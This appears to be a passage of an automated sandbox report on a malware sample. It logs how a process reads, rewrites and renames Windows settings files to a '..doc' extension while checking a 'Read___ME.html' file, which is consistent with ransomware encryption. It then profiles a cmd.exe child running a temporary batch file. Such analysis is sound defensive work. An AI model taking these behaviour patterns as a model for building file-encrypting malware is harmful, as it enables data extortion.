File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, type = size, size_out = 1146	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 8192, size_out = 1146	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 1152	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, type = size, size_out = 1156	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 8192, size_out = 1156	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 1168	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, type = size, size_out = 1181	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 8192, size_out = 1181	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 1184	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, type = size, size_out = 1181	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 8192, size_out = 1181	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 1184	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, type = size, size_out = 1119	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 8192, size_out = 1119	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 1120	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, type = size, size_out = 1123	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 8192, size_out = 1123	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 1136	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, type = size, size_out = 1146	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 8192, size_out = 1146	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 1152	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
For performance reasons, the remaining 23101 entries are omitted. The remaining entries can be found in glog.xml.

Process #13: cmd.exe

(Host: 203, Network: 0)

Information	Value
ID	#13
File Name	c:\windows\syswow64\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:03, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:20

OS Process Information

Information	Value
PID	0xe40
Parent PID	0xd94 (c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E44 0x E70

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x00000000005e0000	0x005e0000	0x005fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000005e0000	0x005e0000	0x005effff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000005f0000	0x005f0000	0x005f3fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000600000	0x00600000	0x00601fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000600000	0x00600000	0x00603fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x00623fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000630000	0x00630000	0x0066ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000670000	0x00670000	0x0076ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000770000	0x00770000	0x00773fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000780000	0x00780000	0x00780fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000790000	0x00790000	0x00791fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007a0000	0x007a0000	0x007dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007e0000	0x007e0000	0x007effff	Private Memory	Readable, Writable	Region Actions
cmd.exe.mui	0x007f0000	0x00810fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000830000	0x00830000	0x0083ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00840000	0x008fdfff	Memory Mapped File	Readable	Region Actions
private_0x00000000009d0000	0x009d0000	0x00acffff	Private Memory	Readable, Writable	Region Actions
cmd.exe	0x00ba0000	0x00beffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000bf0000	0x00bf0000	0x04beffff	Pagefile Backed Memory	-	Region Actions
private_0x0000000004bf0000	0x04bf0000	0x04ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004e70000	0x04e70000	0x04e7ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x04e80000	0x051b6fff	Memory Mapped File	Readable	Region Actions
cmdext.dll	0x74040000	0x74047fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007fc00000	0x7fc00000	0x7fcfffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007fd00000	0x7fd00000	0x7fd22fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007fd28000	0x7fd28000	0x7fd2afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007fd2b000	0x7fd2b000	0x7fd2bfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007fd2c000	0x7fd2c000	0x7fd2cfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007fd2d000	0x7fd2d000	0x7fd2ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xe44

(Host: 177, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\cmd.exe, base_address = 0xba0000	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x762e2780	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
